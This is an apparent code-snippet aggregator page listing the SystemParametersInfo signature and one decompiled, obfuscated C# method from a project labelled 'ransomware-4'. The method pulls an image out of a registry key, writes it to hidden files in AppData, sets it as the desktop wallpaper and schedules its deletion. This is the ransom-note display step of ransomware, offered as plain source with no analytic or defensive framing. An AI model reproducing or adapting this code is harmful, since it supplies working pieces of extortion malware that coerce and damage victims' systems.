SystemParametersInfo() private method

private SystemParametersInfo ( int int_4, int int_5, string string_7, int int_6 ) : int
int_4 int
int_5 int
string_7 string
int_6 int
return int
コード例 #1
0
ファイル: GClass0.cs プロジェクト: 5l1v3r1/ransomware-4
    public void method_10()
    {
        string string_  = Delegate125.smethod_0(Delegate120.smethod_0(Environment.SpecialFolder.ApplicationData), "\\", this.string_3, ".img");
        string string_2 = Delegate125.smethod_0(Delegate120.smethod_0(Environment.SpecialFolder.ApplicationData), "\\", this.string_3, ".bmp");
        string text     = Delegate88.smethod_0("HKEY_CURRENT_USER\\Software\\", this.string_3, "\\Keys");

        byte[] byte_ = (byte[])Delegate169.smethod_0(text, "Wallpaper", "Can't receive wallpaper");
        Delegate170.smethod_0(string_, byte_);
        Bitmap object_ = (Bitmap)Delegate171.smethod_0(string_);

        Delegate172.smethod_0(object_, string_2);
        GClass0.SystemParametersInfo(20, 0, string_2, 3);
        RegistryKey object_2 = Delegate173.smethod_0(Registry.CurrentUser, "Control Panel\\Desktop", true);

        Delegate174.smethod_0(object_2, "WallpaperStyle", 0);
        Delegate175.smethod_0(object_2);
        Delegate128.smethod_0(string_, FileAttributes.Hidden);
        Delegate128.smethod_0(string_2, FileAttributes.Hidden);
        GClass0.MoveFileEx(string_, null, 4);
    }